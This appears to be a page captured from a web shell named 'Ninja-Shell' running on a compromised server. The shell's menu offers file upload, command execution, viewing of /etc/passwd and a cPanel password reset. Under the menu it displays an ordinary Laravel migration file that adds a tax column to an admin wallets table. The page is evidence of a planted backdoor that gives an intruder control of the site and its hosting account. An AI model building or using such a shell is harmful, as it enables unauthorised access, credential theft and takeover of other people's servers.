{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www//arsu//database//migrations//2021_10_13_091801_add_col_to_admin_wallets.php
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; class AddColToAdminWallets extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::table('admin_wallets', function (Blueprint $table) { $table->float('total_tax_collected')->default(0); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::table('admin_wallets', function (Blueprint $table) { // }); } }
./Ninja\.